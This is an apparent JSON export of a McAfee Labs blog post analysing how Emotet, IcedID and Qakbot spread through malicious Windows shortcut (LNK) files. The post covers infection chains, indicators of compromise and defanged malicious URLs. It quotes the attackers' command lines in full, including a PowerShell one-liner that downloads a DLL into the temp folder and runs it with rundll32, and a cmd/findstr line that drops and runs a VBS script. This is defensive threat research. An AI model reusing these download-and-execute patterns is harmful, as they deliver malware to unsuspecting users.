{"id":155118,"date":"2022-06-21T11:58:20","date_gmt":"2022-06-21T18:58:20","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=155118"},"modified":"2024-02-26T19:37:52","modified_gmt":"2024-02-27T03:37:52","slug":"rise-of-lnk-shortcut-files-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","title":{"rendered":"Rise of LNK (Shortcut files) Malware"},"content":{"rendered":"

Authored by Lakshya Mathur<\/p>\n

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built \u201clnkbombs\u201d tools specifically for malicious purposes.<\/p>\n

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.<\/p>\n

\"Figure
Figure 1 \u2013 Apr to May month geolocation of the LNK attacks<\/figcaption><\/figure>\n

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.<\/p>\n

Below is a screenshot of how these shortcut files look to a normal user.<\/p>\n

\"Figure
Figure 2 _ LNK files as seen by a normal user<\/figcaption><\/figure>\n

LNK THREAT ANALYSIS & CAMPAIGNS<\/strong><\/h2>\n

With Microsoft disabling office macros by default<\/a> malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.<\/p>\n

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.<\/p>\n

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.<\/p>\n

 <\/p>\n

EMOTET<\/strong><\/h2>\n

Infection-Chain<\/em><\/strong><\/h3>\n
\"Figure
Figure 3 _Emotet delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n

Threat Analysis<\/em><\/strong><\/h2>\n
\"Figure
Figure 4 _ Email user received having malicious LNK attached<\/figcaption><\/figure>\n

In Figure 4 we can see the lure message and attached malicious LNK file.<\/p>\n

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:<\/p>\n

\"Figure
Figure 5 _Properties of Emotet LNK sample<\/figcaption><\/figure>\n

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.<\/p>\n

In our case the argument is \/v:on \/c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\\YlScZcZKeP.vbs” & “%tmp%\\YlScZcZKeP.vbs”<\/p>\n

\"Figure
Figure 6 _ Contents of Emotet LNK file<\/figcaption><\/figure>\n

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs<\/p>\n

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.<\/p>\n

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.<\/p>\n

ICEDID<\/strong><\/h2>\n

Infection-Chain<\/em><\/strong><\/h3>\n
\"Figure
Figure 7 _ IcedID delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n

Threat Analysis<\/em><\/strong><\/h2>\n

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.<\/p>\n

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties<\/p>\n

\"Figure
Figure 8 _ Properties of IcedID LNK sample<\/figcaption><\/figure>\n

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps:\/\/hectorcalle[.]com\/093789.hta.<\/p>\n

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps:\/\/hectorcalle[.]com\/listbul.exe<\/p>\n

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.<\/p>\n

QAKBOT<\/strong><\/h2>\n

Infection-Chain<\/em><\/strong><\/h3>\n
\"Figure
Figure 9 _ Qakbot delivered via LNK file Infection-Chain<\/figcaption><\/figure>\n

Threat Analysis<\/em><\/strong><\/h2>\n

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.<\/p>\n

\"Figure
Figure 10 _ Properties of Qakbot LNK sample<\/figcaption><\/figure>\n

In Figure 10 the full target part argument is \u201cC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit iwr -Uri hxxps:\/\/news-wellness[.]com\/5MVhfo8BnDub\/D.png -OutFile $env:TEMP\\test.dll;Start-Process rundll32.exe $env:TEMP\\test.dll,jhbvygftr\u201d<\/p>\n

When this PowerShell LNK is invoked, it connects to hxxps:\/\/news-wellness[.]com\/5MVhfo8BnDub\/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll<\/p>\n

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.<\/p>\n

CONCLUSION<\/strong><\/h2>\n

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.<\/p>\n

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.<\/p>\n

IOC (Indicators of Compromise)<\/strong><\/h2>\n\n\n\n\n\n\n\n
Type<\/strong><\/td>\nSHA-256<\/strong><\/td>\nScanner<\/strong><\/td>\n <\/td>\n<\/tr>\n
Emotet LNK<\/td>\n02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71<\/td>\nWSS<\/td>\nLNK\/Emotet-FSE<\/td>\n<\/tr>\n
IcedID LNK<\/td>\n24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9<\/td>\nWSS<\/td>\nLNK\/Agent-FTA<\/p>\n

Suspicious ZIP!lnk<\/td>\n<\/tr>\n

Qakbot LNK<\/td>\nb5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172<\/td>\nWSS<\/td>\nLNK\/Agent-TSR<\/p>\n

 <\/td>\n<\/tr>\n

URLs (Uniform Resource Locator)<\/td>\nhxxps:\/\/creemo[.]pl\/wp-admin\/ZKS1DcdquUT4Bb8Kb\/<\/p>\n

hxxp:\/\/filmmogzivota[.]rs\/SpryAssets\/gDR\/<\/p>\n

hxxp:\/\/demo34.ckg[.]hk\/service\/hhMZrfC7Mnm9JD\/<\/p>\n

hxxp:\/\/focusmedica[.]in\/fmlib\/IxBABMh0I2cLM3qq1GVv\/<\/p>\n

hxxp:\/\/cipro[.]mx\/prensa\/siZP69rBFmibDvuTP1\/<\/p>\n

hxxps:\/\/hectorcalle[.]com\/093789.hta<\/p>\n

hxxps:\/\/hectorcalle[.]com\/listbul.exe<\/p>\n

hxxps:\/\/green-a-thon[.]com\/LosZkUvr\/B.png<\/td>\n

WebAdvisor<\/td>\nAll URLs Blocked<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.<\/p>\n","protected":false},"author":695,"featured_media":155133,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-155118","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"\nRise of LNK (Shortcut files) Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rise of LNK (Shortcut files) Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-21T18:58:20+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-27T03:37:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Rise of LNK (Shortcut files) Malware\",\"datePublished\":\"2022-06-21T18:58:20+00:00\",\"dateModified\":\"2024-02-27T03:37:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"},\"wordCount\":1095,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\",\"name\":\"Rise of LNK (Shortcut files) Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"datePublished\":\"2022-06-21T18:58:20+00:00\",\"dateModified\":\"2024-02-27T03:37:52+00:00\",\"description\":\"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Rise of LNK (Shortcut files) Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Rise of LNK (Shortcut files) Malware | McAfee Blog","description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Rise of LNK (Shortcut files) Malware | McAfee Blog","og_description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2022-06-21T18:58:20+00:00","article_modified_time":"2024-02-27T03:37:52+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Rise of LNK (Shortcut files) Malware","datePublished":"2022-06-21T18:58:20+00:00","dateModified":"2024-02-27T03:37:52+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"},"wordCount":1095,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/","name":"Rise of LNK (Shortcut files) Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","datePublished":"2022-06-21T18:58:20+00:00","dateModified":"2024-02-27T03:37:52+00:00","description":"An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. McAfee Labs has seen a rise in malware being delivered using LNK files.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/06\/300x200_Blog_LNK-Malware.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-of-lnk-shortcut-files-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Rise of LNK (Shortcut files) Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=155118"}],"version-history":[{"count":3,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118\/revisions"}],"predecessor-version":[{"id":184183,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/155118\/revisions\/184183"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/155133"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=155118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=155118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=155118"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=155118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}